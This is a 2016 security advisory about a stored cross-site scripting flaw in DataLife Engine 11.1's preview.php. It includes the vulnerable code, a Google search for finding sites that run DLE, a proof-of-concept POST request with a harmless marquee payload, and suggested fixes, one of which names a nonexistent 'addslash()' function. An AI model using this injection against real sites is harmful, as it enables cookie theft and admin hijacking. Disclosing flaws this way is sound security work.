DataLife Engine 11.1 - Stored Cross Site Scripting (XSS)...
==========================
- Discovered By : 0x3a
- http://iran-cyber.net
- taha[dot]0x3a[at]gmail[dot]com
- Credit To Iran Cyber Security Group
- Release Date : 10.8.2016
- Level : High
==========================
I.Vulnerability
---------------
DataLife Engine 11.1 <= Cross Site Scripting And Lower Version
DataLife Engine 11
DataLife Engine 10
II.BackGround
-------------
DataLife Engine (DLE) is a cms that you can make your WebSite & Forum .
https://dle-news.com/
https://ru.wikipedia.org/wiki/DataLife_Engine
a google search "intext:Powered+by+DataLife+Engine" returned a 1 milion website hosted by DLE
https://www.google.com/search?q=intext:Powered+by+DataLife+Engine
III.Introduction
----------------
DataLife Engine is a multifunctional Content Management System. Thanks to a very powerful news, articles, and users management system, DataLife Engine is designed primarily for the own mass media websites and blogs creation on the Internet.
IV.DESCRIPTION
--------------
DLE have security problem. it can be exploited by xss attack.
This vulnerability occurs in /DLE/engine/preview.php.
With this vulnerability you can inject your malicious code in website.
These restrictions can be found in /DLE/engine/preview.php source file:
if( $config['allow_site_wysiwyg'] ) {
$title = stripslashes( $parse->process( $_POST['title'] ) );
They used $_POST function without any filter that make XSS vulnerability.
With this vulnerability you can make cookie hijacking attack because when you post any text admin must check it and
submit it.
V.PROOF OF CONCEPT EXPLOIT
--------------------------
First you must register in the DLE website.
Then you can send post. Complete All Fields then open your HTTP Live Header so click
on preview button
POST Parameteres :
title=Test&catlist%5B%5D=1&vote_title=&frage=&vote_body=&short_story=Test&full_story=Test&tags=&sec_code=174991&nview=&mod=preview
And you can run your payload in this parameter :
[ title ]
title=<marquee>Discovered By 0x3a [ Iran Cyber Security Group]</marquee>&catlist%5B%5D=1&vote_title=&frage=&vote_body=&short_story=Test&full_story=Test&tags=&sec_code=174991&nview=&mod=preview
VI.SYSTEM AFFECTED
------------------
All version of DLE Affected
VII.SOLUTION
------------
1.You can use filter function like as htmlspecialchars() , addslash() , htmlentities() to patch this
vulnerability
2.You can ban registring in your website but ...
------
0x3a
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum